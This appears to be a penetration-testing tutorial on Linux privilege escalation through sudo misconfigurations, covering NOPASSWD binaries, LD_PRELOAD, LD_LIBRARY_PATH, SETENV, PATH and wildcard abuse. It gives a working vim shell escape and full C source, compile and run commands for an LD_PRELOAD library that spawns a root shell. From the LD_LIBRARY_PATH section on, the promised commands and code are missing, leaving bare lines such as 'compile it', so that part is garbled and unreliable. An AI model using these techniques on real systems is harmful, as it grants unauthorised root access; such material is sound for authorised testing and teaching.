Sudo Misconfigurations

The following sudo configuration allow an user to execute some command with another user's privileges without knowing the password.

$ sudo -l

User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/vim

If you can run a binary with sudo rights, you may want to have look at GTFOBins, a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case with vim, we can spawn a shell with following commands:

sudo -u root vim -c '!sh'

LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.

If env_keep+=LD_PRELOAD is explicitly defined in the sudo -l output and you can call some command with sudo, you can escalate your privileges.

$ sudo -l

env_reset, env_keep+=LD_PRELOAD
User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/find

To exploit, we can write a shared library

//Saved as /tmp/privEsc.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}

compile it

gcc -fPIC -shared -o something.so /tmp/privEsc.c -nostartfiles

Then run the sudo binary with LD_PRELOAD environement variable

#Use any command you can run with sudo
sudo LD_PRELOAD=./something.so <COMMAND>

#Example
sudo LD_PRELOAD=./something.so /usr/bin/find

the LD_LIBRARY_PATH env variable controls the path where libraries are going to be searched.

If env_keep+=LD_LIBRARY_PATH is explicitly defined in the sudo -l output and you can call some command with sudo, you can escalate your privileges.

To abuse it we can do as follow

First, print the shared libraries of the sudo program. We will take /usr/bin/find as an example

Use one of the shared objects in the list and we will hijack it by creating a file with same name. For this demonstration, we will be targeting the libpcre2-8.so.0 file.

compile it

Then run the sudo binary with LD_LIBRARY_PATH environement variable

This SETENVdirective allows the user to set an environment variable while executing something:

The previous example, based on HTB machine Admirer, was vulnerable to PYTHONPATH hijacking to load an arbitrary python library while executing the script as root:

Or, you can set the PATH env variable if you can sudo on a binary without the full command path specified.

If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.

Instead we need to check if we have permission to write each path if a the sudo binary is specified without the full command path.

We need to check if we have permission to write each path.

Assume we can write an arbitrary binary file under /usr/sbin, we can create a payload in there. For example, we create a python binary under /usr/sbin.

Then execute the sudo command.

If we can execute some command as root and it contains a wildcard. We may use symlinks, path traversal or multiple arguments to exploit it.

We can exploit it by using path traversal technique

or we can exploit it by using symlinks technique

Finally we can try to read 2 files at same time